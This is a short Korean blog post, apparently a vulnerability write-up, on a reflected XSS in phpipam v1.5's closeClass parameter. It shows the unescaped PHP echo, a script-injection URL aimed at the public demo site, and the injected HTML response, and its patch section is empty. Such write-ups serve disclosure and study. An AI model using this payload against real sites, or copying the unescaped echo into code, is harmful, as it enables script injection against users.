반응형
    
    
    
  ref
배경
- pipipam 은 open-source web IP address management application 이다.
 - phpipam v1.5 버젼에서 Reflected corss-site scripting공격이 가능한 파라미터가 발견되었다. 해당 파라미터는 closeClass 이고 /subnet-masks/popup.php. 엔트리에서 발견되었다.
 
분석
- pipipam v1.5 를 이용하여 테스트가 가능하다.
 - 테스트 사이트 : https://demo.phpipam.net/
 
테스트
- 로그인을 수행
 - 로그인 이후 아래 공격 코드를 url로 입력
 
[<https://demo.phpipam.net/app/tools/subnet-masks/popup.php?closeClass=">](https://demo.phpipam.net/app/tools/subnet-masks/popup.php?closeClass=%22%3E)alert("XSS>")

<!-- footer -->
<div class="pFooter">
	<div class="btn-group">
		<button class="btn btn-sm btn-default <?php print @$_REQUEST['closeClass']; ?>"><?php print _('Close'); ?></button>
	</div>
</div>
- 공격코드로 공격 수행시 브라우져 응답은 다음과 같다.
 
<!-- footer -->
<div class="pFooter">
	<div class="btn-group">
		<button class="btn btn-sm btn-default "><script>alert("XSS")</script>">Close</button>
	</div>
</div>
패치 방법
반응형